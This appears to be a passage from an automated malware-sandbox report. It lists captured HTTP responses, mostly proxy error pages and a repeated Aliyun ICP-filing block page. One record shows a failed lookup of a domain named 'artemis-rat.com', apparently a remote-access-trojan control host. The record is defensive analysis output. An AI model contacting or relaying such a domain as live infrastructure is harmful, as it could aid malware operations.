6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:05 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:05 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:05 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:06 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:05 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:06 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3629X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:08 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:35 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 35 30 38 31 30 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:50810->1.1.1.1:53: i/o timeout
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:46 GMTContent-Type: text/html;charset=utf-8Content-Length: 3700X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from hostX-Cache-Lookup: NONE from host:3128Connection: closeData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0 Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.10Mime-Version: 1.0Date: Tue, 12 Mar 2024 08:01:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 3819X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERR
